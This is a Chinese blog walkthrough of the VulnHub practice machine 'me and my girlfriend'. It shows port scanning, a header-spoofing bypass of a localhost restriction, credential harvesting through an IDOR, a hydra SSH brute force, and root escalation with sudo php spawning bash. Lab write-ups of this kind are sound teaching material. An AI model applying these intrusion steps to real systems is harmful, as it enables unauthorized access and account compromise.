• 8.me and my girlfriend


    me and my girlfriend

    一个不错的练手靶机

    https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/

    靶机 : me and my girlfriend

    渗透机 : kali + win10

    补充 : 如果靶机自带的是nat网络 , 如果需要更改 , 别忘记啦 , 我忘记是什么啦

    目标: 拿到flag1.txt flag2.txt

    0x01. 信息收集

    1. 确定靶机ip

    扫描当前网段ip

    image-20210701204939878

    kali 192.168.0.105 靶机 192.168.0.110

    2. 扫描全端口

    rustscan -a 192.168.0.110 -r 1-65535 -- -sV
    这里用的是rustscan扫描的 , 当然你也可以用nmap
    

    image-20210701205059221

    既然开放了 22 80 , 那么访问一下80端口 , 发现只允许本地访问 , 那么我们就简单的绕一下

    image-20210701205227122

    X-Originating-IP: 127.0.0.1
    X-Forwarded-For: 127.0.0.1
    X-Remote-IP: 127.0.0.1
    X-Remote-Addr: 127.0.0.1
    X-Client-IP: 127.0.0.1
    不知道是哪个头获取的ip , 索性全加上吧
    

    image-20210701205559934

    这样就有权限访问了 , 接下来就是简单的注册一个登录试一试

    image-20210701205833309

    0x02. 漏洞探测

    1. 漏洞验证

    通过你多年的渗透经验 , 发现了一个uid参数 , 很有可能存在越权漏洞 , fuzz一下试试

    image-20210701205948785

    细节 , 0-12

    image-20210701210034343

    果然存在越权漏洞 , 获取到存在的账号和密码

    user
    alice                         
    sundatea                 
    aingmaung             
    abdikasepak           
    eweuhtandingan     
    sedihaingmah 
    
    passwd
    4lic3
    indONEsia
    qwerty!!!
    dorrrrr
    skuyatuh
    cedihhihihi
    

    之前扫描出来一个22端口 , 尝试用这些账号和密码爆破一下

    hydra -L ./user.txt -P ./passwd.txt -vV -f 192.168.0.110 ssh
    

    最后爆出账密

    alice       4lic3
    

    然后就是ssh登录

    2. 拿到shell

    ssh alice@192.168.0.110
    

    image-20210701210446622

    然后通过查看家目录的隐藏文件 , 找到一个我的秘密文件夹

    image-20210701210600811

    根据提示 , 接下来就是提权进到root下找到最后的flag啦

    0x03. 提权

    1. 主机信息收集

    提权的本质也就是根据主机的漏洞 , 进行权限提升 , 所以还是要信息收集的

    GitHub - rebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks

    或者用这个提权辅助工具
    https://github.com/mzet-/linux-exploit-suggester.git
    wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
    

    上传Linux信息收集脚本发现一个sudoers提权方法 , 但是靶机无法调用gcc编译 , 所以看看有没有其他方法

    2. php提权

    sudo -l
    

    https://gtfobins.github.io/gtfobins/php/#suid

    sudo php -r "system('/bin/bash');"
    

    image-20210701211040208

    顺利拿到第二个flag

    Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}
    
  • 相关阅读:
    HDOJ 2689
    UVALive 3635 Pie 切糕大师 二分
    黑马程序员 Java基础<十八>---> 网路编程
    C# 数据库dataGridView刷新数据和主外键判断
    影视-纪录片:《生死洄游》
    汉语-词语:旅行
    汉语-词语:探险
    风水学:龙脉
    人物-探险家:斯文·赫定
    影视-纪录片:《河西走廊之嘉峪关》
  • 原文地址:https://www.cnblogs.com/xcymn/p/15712504.html
Copyright © 2020-2023  润新知